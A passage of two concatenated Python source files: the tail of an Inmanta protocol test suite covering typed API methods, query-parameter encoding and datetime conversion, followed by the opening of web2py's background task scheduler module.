async_finalizer.add(rs.stop)
port = opt.get_bind_port()
url = f"http://localhost:{port}/test/v1/project/afcb51dc-1043-42b6-bb99-b4fc88603126"
request = HTTPRequest(url=url, method="GET")
client = AsyncHTTPClient()
response = await client.fetch(request, raise_error=False)
assert response.code == 400
assert json.loads(response.body)["message"] == "Invalid request: Field 'tid' is required."
@pytest.mark.asyncio
async def test_multiple_path_params(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, age: int) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_methodY(self, id: str, name: str, age: int) -> str: # NOQA
return name
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(args=[], kwargs={"id": "1", "name": "monty", "age": 42})
assert request.url == "/api/v1/test/1/monty?age=42"
@pytest.mark.asyncio(timeout=5)
async def test_2151_method_header_parameter_in_body(async_finalizer) -> None:
async def _id(x: object, dct: Dict[str, str]) -> object:
return x
@protocol.method(
path="/testmethod",
operation="POST",
arg_options={"header_param": ArgOption(header="X-Inmanta-Header-Param", getter=_id)},
client_types=[const.ClientType.api],
)
def test_method(header_param: str, body_param: str) -> None:
"""
A method used for testing.
"""
class TestSlice(ServerSlice):
@protocol.handle(test_method)
async def test_method_implementation(self, header_param: str, body_param: str) -> None:
pass
server: Server = Server()
server_slice: ServerSlice = TestSlice("my_test_slice")
server.add_slice(server_slice)
await server.start()
async_finalizer.add(server_slice.stop)
async_finalizer.add(server.stop)
client = tornado.httpclient.AsyncHTTPClient()
# valid request should succeed
request = tornado.httpclient.HTTPRequest(
url=f"http://localhost:{opt.get_bind_port()}/api/v1/testmethod",
method="POST",
body=json_encode({"body_param": "body_param_value"}),
headers={"X-Inmanta-Header-Param": "header_param_value"},
)
response: tornado.httpclient.HTTPResponse = await client.fetch(request)
assert response.code == 200
# invalid request should fail
request = tornado.httpclient.HTTPRequest(
url=f"http://localhost:{opt.get_bind_port()}/api/v1/testmethod",
method="POST",
body=json_encode({"header_param": "header_param_value", "body_param": "body_param_value"}),
)
with pytest.raises(tornado.httpclient.HTTPClientError):
await client.fetch(request)
@pytest.mark.parametrize("return_value,valid", [(1, True), (None, True), ("Hello World!", False)])
@pytest.mark.asyncio
async def test_2277_typedmethod_return_optional(async_finalizer, return_value: object, valid: bool) -> None:
@protocol.typedmethod(
path="/typedtestmethod",
operation="GET",
client_types=[const.ClientType.api],
api_version=1,
)
def test_method_typed() -> Optional[int]:
"""
A typedmethod used for testing.
"""
class TestSlice(ServerSlice):
@protocol.handle(test_method_typed)
async def test_method_typed_implementation(self) -> Optional[int]:
return return_value # type: ignore
server: Server = Server()
server_slice: ServerSlice = TestSlice("my_test_slice")
server.add_slice(server_slice)
await server.start()
async_finalizer.add(server_slice.stop)
async_finalizer.add(server.stop)
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method_typed()
if valid:
assert response.code == 200
assert response.result == {"data": return_value}
else:
assert response.code == 400
def test_method_strict_exception() -> None:
with pytest.raises(InvalidMethodDefinition, match="Invalid type for argument arg: Any type is not allowed in strict mode"):
@protocol.typedmethod(path="/testmethod", operation="POST", client_types=[const.ClientType.api])
def test_method(arg: Any) -> None:
pass
@pytest.mark.asyncio
async def test_method_nonstrict_allowed(async_finalizer) -> None:
@protocol.typedmethod(path="/zipsingle", operation="POST", client_types=[const.ClientType.api], strict_typing=False)
def merge_dicts(one: Dict[str, Any], other: Dict[str, int], any_arg: Any) -> Dict[str, Any]:
"""
Merge two dicts.
"""
class TestSlice(ServerSlice):
@protocol.handle(merge_dicts)
async def merge_dicts_impl(self, one: Dict[str, Any], other: Dict[str, int], any_arg: Any) -> Dict[str, Any]:
return {**one, **other}
server: Server = Server()
server_slice: ServerSlice = TestSlice("my_test_slice")
server.add_slice(server_slice)
await server.start()
async_finalizer.add(server_slice.stop)
async_finalizer.add(server.stop)
client: protocol.Client = protocol.Client("client")
one: Dict[str, Any] = {"my": {"nested": {"keys": 42}}}
other: Dict[str, int] = {"single_level": 42}
response: Result = await client.merge_dicts(one, other, None)
assert response.code == 200
assert response.result == {"data": {**one, **other}}
@pytest.mark.parametrize(
"param_type,param_value,expected_url",
[
(
Dict[str, str],
{"a": "b", "c": "d", ",&?=%": ",&?=%."},
"/api/v1/test/1/monty?filter.a=b&filter.c=d&filter.%2C%26%3F%3D%25=%2C%26%3F%3D%25.",
),
(
Dict[str, List[str]],
{"a": ["b"], "c": ["d", "e"], "g": ["h"]},
"/api/v1/test/1/monty?filter.a=b&filter.c=d&filter.c=e&filter.g=h",
),
(
Dict[str, List[str]],
{"a": ["b"], "c": ["d", "e"], ",&?=%": [",&?=%", "f"], ".g.h": ["i"]},
"/api/v1/test/1/monty?filter.a=b&filter.c=d&filter.c=e"
"&filter.%2C%26%3F%3D%25=%2C%26%3F%3D%25&filter.%2C%26%3F%3D%25=f&filter..g.h=i",
),
(
List[str],
[
"a ",
"b,",
"c",
],
"/api/v1/test/1/monty?filter=a+&filter=b%2C&filter=c",
),
(
List[str],
["a", "b", ",&?=%", "c", "."],
"/api/v1/test/1/monty?filter=a&filter=b&filter=%2C%26%3F%3D%25&filter=c&filter=.",
),
(List[str], ["a ", "b", "c", ","], "/api/v1/test/1/monty?filter=a+&filter=b&filter=c&filter=%2C"),
],
)
@pytest.mark.asyncio
async def test_dict_list_get_roundtrip(
unused_tcp_port, postgres_db, database_name, async_finalizer, param_type, param_value, expected_url
):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"], strict_typing=False)
def test_method(id: str, name: str, filter: param_type) -> Any: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: param_type) -> Any: # NOQA
return filter
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": param_value}
)
assert request.url == expected_url
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter=param_value)
assert response.code == 200
assert response.result["data"] == param_value
@pytest.mark.asyncio
async def test_dict_get_optional(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Optional[Dict[str, str]] = None) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: Optional[Dict[str, str]] = None) -> str: # NOQA
return ",".join(filter.keys()) if filter is not None else ""
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": {"a": "b"}}
)
assert request.url == "/api/v1/test/1/monty?filter.a=b"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter={"a": "b", "c": "d"})
assert response.code == 200
assert response.result["data"] == "a,c"
response: Result = await client.test_method(1, "monty")
assert response.code == 200
assert response.result["data"] == ""
@pytest.mark.asyncio
async def test_dict_list_nested_get_optional(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Optional[Dict[str, List[str]]] = None) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: Optional[Dict[str, List[str]]] = None) -> str: # NOQA
return ",".join(filter.keys()) if filter is not None else ""
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": {"a": ["b"]}}
)
assert request.url == "/api/v1/test/1/monty?filter.a=b"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter={"a": "b", "c": ["d", "e"]})
assert response.code == 200
assert response.result["data"] == "a,c"
response: Result = await client.test_method(1, "monty")
assert response.code == 200
assert response.result["data"] == ""
@pytest.mark.parametrize(
"param_type,expected_error_message",
[
(
Dict[str, Dict[str, str]],
"nested dictionaries and union types for dictionary values are not supported for GET requests",
),
(
Dict[str, Union[str, List[str]]],
"nested dictionaries and union types for dictionary values are not supported for GET requests",
),
(List[Dict[str, str]], "lists of dictionaries and lists of lists are not supported for GET requests"),
(List[List[str]], "lists of dictionaries and lists of lists are not supported for GET requests"),
],
)
@pytest.mark.asyncio
async def test_dict_list_get_invalid(
unused_tcp_port, postgres_db, database_name, async_finalizer, param_type, expected_error_message
):
configure(unused_tcp_port, database_name, postgres_db.port)
with pytest.raises(InvalidMethodDefinition) as e:
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: param_type) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: param_type) -> str: # NOQA
return ""
assert expected_error_message in str(e)
@pytest.mark.asyncio
async def test_list_get_optional(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, sort: Optional[List[int]] = None) -> str: # NOQA
pass
@protocol.typedmethod(path="/test_uuid/<id>", operation="GET", client_types=["api"])
def test_method_uuid(id: str, sort: Optional[List[uuid.UUID]] = None) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, sort: Optional[List[int]] = None) -> str: # NOQA
return str(sort) if sort else ""
@protocol.handle(test_method_uuid)
async def test_method_uuid(self, id: str, sort: Optional[List[uuid.UUID]] = None) -> str: # NOQA
return str(sort) if sort else ""
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "sort": [1, 2]}
)
assert request.url == "/api/v1/test/1/monty?sort=1&sort=2"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", sort=[1, 2])
assert response.code == 200
assert response.result["data"] == "[1, 2]"
response: Result = await client.test_method(1, "monty")
assert response.code == 200
assert response.result["data"] == ""
uuids = [uuid.uuid4(), uuid.uuid4()]
request = MethodProperties.methods["test_method_uuid"][0].build_call(args=[], kwargs={"id": "1", "sort": uuids})
assert request.url == f"/api/v1/test_uuid/1?sort={uuids[0]}&sort={uuids[1]}"
@pytest.mark.asyncio
async def test_dicts_multiple_get(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Dict[str, List[str]], another_filter: Dict[str, str]) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(
self, id: str, name: str, filter: Dict[str, List[str]], another_filter: Dict[str, str]
) -> str: # NOQA
return ",".join(chain(filter.keys(), another_filter.keys()))
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
request = MethodProperties.methods["test_method"][0].build_call(
args=[], kwargs={"id": "1", "name": "monty", "filter": {"a": ["b", "c"]}, "another_filter": {"d": "e"}}
)
assert request.url == "/api/v1/test/1/monty?filter.a=b&filter.a=c&another_filter.d=e"
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(1, "monty", filter={"a": ["b"], "c": ["d", "e"]}, another_filter={"x": "y"})
assert response.code == 200
assert response.result["data"] == "a,c,x"
@pytest.mark.asyncio
async def test_dict_list_get_by_url(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test/<id>/<name>", operation="GET", client_types=["api"])
def test_method(id: str, name: str, filter: Dict[str, str]) -> str: # NOQA
pass
@protocol.typedmethod(path="/test_list/<id>", operation="GET", client_types=["api"])
def test_method_list(id: str, filter: List[int]) -> str: # NOQA
pass
@protocol.typedmethod(path="/test_dict_of_lists/<id>", operation="GET", client_types=["api"])
def test_method_dict_of_lists(id: str, filter: Dict[str, List[str]]) -> str: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, id: str, name: str, filter: Dict[str, str]) -> str: # NOQA
return ",".join(filter.keys())
@protocol.handle(test_method_list)
async def test_method_list(self, id: str, filter: List[int]) -> str: # NOQA
return str(filter)
@protocol.handle(test_method_dict_of_lists)
async def test_method_dict_of_lists(self, id: str, filter: Dict[str, List[str]]) -> str: # NOQA
return ",".join(filter.keys())
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = AsyncHTTPClient()
response = await client.fetch(f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty?filter.=b", raise_error=False)
assert response.code == 400
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty?filter.a=b&filter.=c", raise_error=False
)
assert response.code == 400
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty?filter.a=b&filter.a=c", raise_error=False
)
assert response.code == 400
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_list/1?filter.a=b&filter.=c", raise_error=False
)
assert response.code == 400
# Integer should also work
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_list/1?filter=42&filter=45", raise_error=False
)
assert response.code == 200
# list nested in dict
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_dict_of_lists/1?filter.a=42&filter.a=55&filter.b=e",
raise_error=False,
)
assert response.code == 200
filter_with_comma = {"filter.a": "42,55,%2C70", "filter.b": "e"}
url = url_concat(f"http://localhost:{server_bind_port.get()}/api/v1/test_dict_of_lists/1", filter_with_comma)
response = await client.fetch(
url,
raise_error=False,
)
assert response.code == 200
response = await client.fetch(
f"http://localhost:{server_bind_port.get()}/api/v1/test_dict_of_lists/1?filter.a=42&filter.a=55&filter.&filter.c=a",
raise_error=False,
)
assert response.code == 400
filter_with_comma = {"filter.a": "b", "filter.c": "e", "filter.,&?=%": ",&?=%"}
url = url_concat(f"http://localhost:{server_bind_port.get()}/api/v1/test/1/monty", filter_with_comma)
response = await client.fetch(
url,
raise_error=False,
)
assert response.code == 200
@pytest.mark.asyncio
async def test_api_datetime_utc(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test API input and output conversion for timestamps. Objects should be either timezone-aware or implicit UTC.
"""
configure(unused_tcp_port, database_name, postgres_db.port)
timezone: datetime.timezone = datetime.timezone(datetime.timedelta(hours=2))
now: datetime.datetime = datetime.datetime.now().astimezone(timezone)
naive_utc: datetime.datetime = now.astimezone(datetime.timezone.utc).replace(tzinfo=None)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method(timestamp: datetime.datetime) -> List[datetime.datetime]:
pass
@protocol.handle(test_method)
async def test_method(self, timestamp: datetime.datetime) -> List[datetime.datetime]:
assert timestamp.tzinfo is not None
assert timestamp == now
return [
now,
now.astimezone(datetime.timezone.utc),
now.astimezone(datetime.timezone.utc).replace(tzinfo=None),
]
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client: protocol.Client = protocol.Client("client")
response: Result = await client.test_method(timestamp=now)
assert response.code == 200
assert all(pydantic.parse_obj_as(datetime.datetime, timestamp) == naive_utc for timestamp in response.result["data"])
response: Result = await client.test_method(timestamp=now.astimezone(datetime.timezone.utc))
assert response.code == 200
response: Result = await client.test_method(timestamp=now.astimezone(datetime.timezone.utc).replace(tzinfo=None))
assert response.code == 200
response: Result = await client.test_method(timestamp=now.replace(tzinfo=None))
assert response.code == 500
# Test REST API without going through Python client
port = opt.get_bind_port()
client = AsyncHTTPClient()
async def request(timestamp: datetime.datetime) -> tornado.httpclient.HTTPResponse:
request = HTTPRequest(
url=(
f"http://localhost:{port}/api/v1/test?timestamp="
f"{urllib.parse.quote(timestamp.isoformat(timespec='microseconds'))}"
),
method="GET",
)
return await client.fetch(request)
response = await request(now)
assert response.code == 200
response = await request(now.astimezone(datetime.timezone.utc).replace(tzinfo=None))
assert response.code == 200
with pytest.raises(tornado.httpclient.HTTPClientError):
response = await request(now.replace(tzinfo=None))
@pytest.mark.asyncio
async def test_dict_of_list(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test API output conversion for a Dict[str, List[BaseModel]] return type: nested pydantic objects should be serialized to plain dicts.
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class APydanticType(BaseModel):
attr: int
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=[const.ClientType.api])
def test_method(id: str) -> Dict[str, List[APydanticType]]:
pass
@protocol.handle(test_method)
async def test_method(self, id: str) -> Dict[str, List[APydanticType]]:
return {id: [APydanticType(attr=1), APydanticType(attr=5)]}
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client: protocol.Client = protocol.Client("client")
result = await client.test_method(id="test")
assert result.code == 200, result.result["message"]
assert result.result["data"] == {"test": [{"attr": 1}, {"attr": 5}]}
@pytest.mark.asyncio
async def test_return_value_with_meta(unused_tcp_port, postgres_db, database_name, async_finalizer):
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="GET", client_types=["api"])
def test_method(with_warning: bool) -> ReturnValueWithMeta[str]: # NOQA
pass
@protocol.handle(test_method)
async def test_method(self, with_warning: bool) -> ReturnValueWithMeta: # NOQA
metadata = {"additionalInfo": f"Today's bitcoin exchange rate is: {(random.random() * 100000):.2f}$"}
result = ReturnValueWithMeta(response="abcd", metadata=metadata)
if with_warning:
result.add_warnings(["Warning message"])
return result
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client: protocol.Client = protocol.Client("client")
response = await client.test_method(False)
assert response.code == 200
assert response.result["data"] == "abcd"
assert response.result["metadata"].get("additionalInfo") is not None
assert response.result["metadata"].get("warnings") is None
response = await client.test_method(True)
assert response.code == 200
assert response.result["data"] == "abcd"
assert response.result["metadata"].get("additionalInfo") is not None
assert response.result["metadata"].get("warnings") is not None
|
scheduler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Background processes made simple
---------------------------------
"""
USAGE = """
## Example
For any existing app
Create File: app/models/scheduler.py ======
from gluon.scheduler import Scheduler
def demo1(*args,**vars):
print 'you passed args=%s and vars=%s' % (args, vars)
return 'done!'
def demo2():
1/0
scheduler = Scheduler(db,dict(demo1=demo1,demo2=demo2))
## run worker nodes with:
cd web2py
python web2py.py -K myapp
or
python gluon/scheduler.py -u sqlite://storage.sqlite \
-f applications/myapp/databases/ \
-t mytasks.py
(-h for info)
python scheduler.py -h
## schedule jobs using
http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task
## monitor scheduled jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id>0
## view completed jobs
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id>0
## view workers
http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id>0
## To install the scheduler as a permanent daemon on Linux (w/ Upstart), put
## the following into /etc/init/web2py-scheduler.conf:
## (This assumes your web2py instance is installed in <user>'s home directory,
## running as <user>, with app <myapp>, on network interface eth0.)
description "web2py task scheduler"
start on (local-filesystems and net-device-up IFACE=eth0)
stop on shutdown
respawn limit 8 60 # Give up if restart occurs 8 times in 60 seconds.
exec sudo -u <user> python /home/<user>/web2py/web2py.py -K <myapp>
respawn
## You can then start/stop/restart/check status of the daemon with:
sudo start web2py-scheduler
sudo stop web2py-scheduler
sudo restart web2py-scheduler
sudo status web2py-scheduler
"""
import os
import time
import multiprocessing
import sys
import threading
import traceback
import signal
import socket
import datetime
import logging
import optparse
import types
import Queue
path = os.getcwd()
if 'WEB2PY_PATH' not in os.environ:
os.environ['WEB2PY_PATH'] = path
try:
# try external module
from simplejson import loads, dumps
except ImportError:
try:
# try stdlib (Python >= 2.6)
from json import loads, dumps
except:
# fallback to pure-Python module
from gluon.contrib.simplejson import loads, dumps
IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid())
logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER)
from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB
from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB
from gluon.utils import web2py_uuid
from gluon.storage import Storage
QUEUED = 'QUEUED'
ASSIGNED = 'ASSIGNED'
RUNNING = 'RUNNING'
COMPLETED = 'COMPLETED'
FAILED = 'FAILED'
TIMEOUT = 'TIMEOUT'
STOPPED = 'STOPPED'
ACTIVE = 'ACTIVE'
TERMINATE = 'TERMINATE'
DISABLED = 'DISABLED'
KILL = 'KILL'
PICK = 'PICK'
STOP_TASK = 'STOP_TASK'
EXPIRED = 'EXPIRED'
SECONDS = 1
HEARTBEAT = 3 * SECONDS
MAXHIBERNATION = 10
CLEAROUT = '!clear!'
CALLABLETYPES = (types.LambdaType, types.FunctionType,
types.BuiltinFunctionType,
types.MethodType, types.BuiltinMethodType)
class Task(object):
"""Defines a "task" object that gets passed from the main thread to the
executor's one
"""
def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs):
logger.debug(' new task allocated: %s.%s', app, function)
self.app = app
self.function = function
self.timeout = timeout
self.args = args # json
self.vars = vars # json
self.__dict__.update(kwargs)
def __str__(self):
return '<Task: %s>' % self.function
class TaskReport(object):
"""Defines a "task report" object that gets passed from the executor's
thread to the main one
"""
def __init__(self, status, result=None, output=None, tb=None):
logger.debug(' new task report: %s', status)
if tb:
logger.debug(' traceback: %s', tb)
else:
logger.debug(' result: %s', result)
self.status = status
self.result = result
self.output = output
self.tb = tb
def __str__(self):
return '<TaskReport: %s>' % self.status
class JobGraph(object):
"""Experimental: with JobGraph you can specify
dependencies amongst tasks"""
def __init__(self, db, job_name):
self.job_name = job_name or 'job_0'
self.db = db
def add_deps(self, task_parent, task_child):
"""Creates a dependency between task_parent and task_child"""
self.db.scheduler_task_deps.insert(task_parent=task_parent,
task_child=task_child,
job_name=self.job_name)
def validate(self, job_name):
"""Validates if all tasks job_name can be completed, i.e. there
are no mutual dependencies among tasks.
Commits at the end if successfull, or it rollbacks the entire
transaction. Handle with care!"""
db = self.db
sd = db.scheduler_task_deps
if job_name:
q = sd.job_name == job_name
else:
q = sd.id > 0
edges = db(q).select()
nested_dict = {}
for row in edges:
k = row.task_parent
if k in nested_dict:
nested_dict[k].add(row.task_child)
else:
nested_dict[k] = set((row.task_child,))
try:
rtn = []
for k, v in nested_dict.items():
v.discard(k) # Ignore self dependencies
extra_items_in_deps = reduce(set.union, nested_dict.values()) - set(nested_dict.keys())
nested_dict.update(dict((item, set()) for item in extra_items_in_deps))
while True:
ordered = set(item for item, dep in nested_dict.items() if not dep)
if not ordered:
break
rtn.append(ordered)
nested_dict = dict(
(item, (dep - ordered)) for item, dep in nested_dict.items()
if item not in ordered
)
assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict
db.commit()
return rtn
except:
db.rollback()
return None
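# Illustrative JobGraph usage (a hedged sketch only; task_a, task_b and
# task_c are hypothetical scheduler_task ids already queued via
# Scheduler.queue_task):
#   graph = JobGraph(db, 'job_0')
#   graph.add_deps(task_a, task_b)   # records a dependency edge between the two tasks
#   graph.add_deps(task_b, task_c)
#   layers = graph.validate('job_0') # topologically ordered groups of ids,
#                                    # or None if a circular dependency is found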
def demo_function(*argv, **kwargs):
""" test function """
for i in range(argv[0]):
print 'click', i
time.sleep(1)
return 'done'
# the two functions below deal with simplejson decoding strings as unicode, especially for the dict decode
# and its subsequent use as function keyword arguments: unicode variable names won't work!
# borrowed from http://stackoverflow.com/questions/956867/how-to-get-string-objects-instead-unicode-ones-from-json-in-python
def _decode_list(lst):
newlist = []
for i in lst:
if isinstance(i, unicode):
i = i.encode('utf-8')
elif isinstance(i, list):
i = _decode_list(i)
newlist.append(i)
return newlist
def _decode_dict(dct):
newdict = {}
for k, v in dct.iteritems():
if isinstance(k, unicode):
k = k.encode('utf-8')
if isinstance(v, unicode):
v = v.encode('utf-8')
elif isinstance(v, list):
v = _decode_list(v)
newdict[k] = v
return newdict
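# A minimal sketch of how these hooks are applied (it mirrors the calls made
# in executor() below, with made-up JSON payloads):
#   args = _decode_list(loads('["a", "b"]'))                   # byte strings, not unicode
#   vars = loads('{"key": "value"}', object_hook=_decode_dict) # keys/values as byte strings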
def executor(queue, task, out):
"""The function used to execute tasks in the background process"""
logger.debug(' task started')
class LogOutput(object):
"""Facility to log output at intervals"""
def __init__(self, out_queue):
self.out_queue = out_queue
self.stdout = sys.stdout
sys.stdout = self
def __del__(self):
sys.stdout = self.stdout
def flush(self):
pass
def write(self, data):
self.out_queue.put(data)
W2P_TASK = Storage({'id': task.task_id, 'uuid': task.uuid})
stdout = LogOutput(out)
try:
if task.app:
os.chdir(os.environ['WEB2PY_PATH'])
from gluon.shell import env, parse_path_info
from gluon import current
level = logging.getLogger().getEffectiveLevel()
logging.getLogger().setLevel(logging.WARN)
# Get controller-specific subdirectory if task.app is of
# form 'app/controller'
(a, c, f) = parse_path_info(task.app)
_env = env(a=a, c=c, import_models=True)
logging.getLogger().setLevel(level)
f = task.function
functions = current._scheduler.tasks
if not functions:
#look into env
_function = _env.get(f)
else:
_function = functions.get(f)
if not isinstance(_function, CALLABLETYPES):
raise NameError(
"name '%s' not found in scheduler's environment" % f)
# Inject W2P_TASK into environment
_env.update({'W2P_TASK': W2P_TASK})
# Inject W2P_TASK into current
from gluon import current
current.W2P_TASK = W2P_TASK
globals().update(_env)
args = _decode_list(loads(task.args))
vars = loads(task.vars, object_hook=_decode_dict)
result = dumps(_function(*args, **vars))
else:
### for testing purposes only
result = eval(task.function)(
*loads(task.args, object_hook=_decode_dict),
**loads(task.vars, object_hook=_decode_dict))
queue.put(TaskReport('COMPLETED', result=result))
except BaseException, e:
tb = traceback.format_exc()
queue.put(TaskReport('FAILED', tb=tb))
del stdout
class MetaScheduler(threading.Thread):
"""Base class documenting scheduler's base methods"""
def __init__(self):
threading.Thread.__init__(self)
self.process = None # the background process
self.have_heartbeat = True # set to False to kill
self.empty_runs = 0
def async(self, task):
"""Starts the background process
Args:
task : a `Task` object
Returns:
a `TaskReport` whose `status` is one of COMPLETED, FAILED, TIMEOUT
or STOPPED, with `result`, `output` and `tb` (traceback) filled in
accordingly
"""
db = self.db
sr = db.scheduler_run
out = multiprocessing.Queue()
queue = multiprocessing.Queue(maxsize=1)
p = multiprocessing.Process(target=executor, args=(queue, task, out))
self.process = p
logger.debug(' task starting')
p.start()
task_output = ""
tout = ""
try:
if task.sync_output > 0:
run_timeout = task.sync_output
else:
run_timeout = task.timeout
start = time.time()
while p.is_alive() and (not task.timeout or time.time() - start < task.timeout):
if tout:
try:
logger.debug(' partial output saved')
db(sr.id == task.run_id).update(run_output=task_output)
db.commit()
except:
pass
p.join(timeout=run_timeout)
tout = ""
while not out.empty():
tout += out.get()
if tout:
logger.debug(' partial output: "%s"' % str(tout))
if CLEAROUT in tout:
task_output = tout[
tout.rfind(CLEAROUT) + len(CLEAROUT):]
else:
task_output += tout
except:
p.terminate()
p.join()
self.have_heartbeat = False
logger.debug(' task stopped by general exception')
tr = TaskReport(STOPPED)
else:
if p.is_alive():
p.terminate()
logger.debug(' task timeout')
try:
# we try to get a traceback here
tr = queue.get(timeout=2)
tr.status = TIMEOUT
tr.output = task_output
except Queue.Empty:
tr = TaskReport(TIMEOUT)
elif queue.empty():
self.have_heartbeat = False
logger.debug(' task stopped')
tr = TaskReport(STOPPED)
else:
logger.debug(' task completed or failed')
tr = queue.get()
tr.output = task_output
return tr
def die(self):
"""Forces termination of the worker process along with any running
task"""
logger.info('die!')
self.have_heartbeat = False
self.terminate_process()
def give_up(self):
"""Waits for any running task to be executed, then exits the worker
process"""
logger.info('Giving up as soon as possible!')
self.have_heartbeat = False
def terminate_process(self):
"""Terminates any running tasks (internal use only)"""
try:
self.process.terminate()
except:
pass # no process to terminate
def run(self):
"""This is executed by the main thread to send heartbeats"""
counter = 0
while self.have_heartbeat:
self.send_heartbeat(counter)
counter += 1
def start_heartbeats(self):
self.start()
def send_heartbeat(self, counter):
print 'thum'
time.sleep(1)
def pop_task(self):
"""Fetches a task ready to be executed"""
return Task(
app=None,
function='demo_function',
timeout=7,
args='[2]',
vars='{}')
def report_task(self, task, task_report):
"""Creates a task report"""
print 'reporting task'
pass
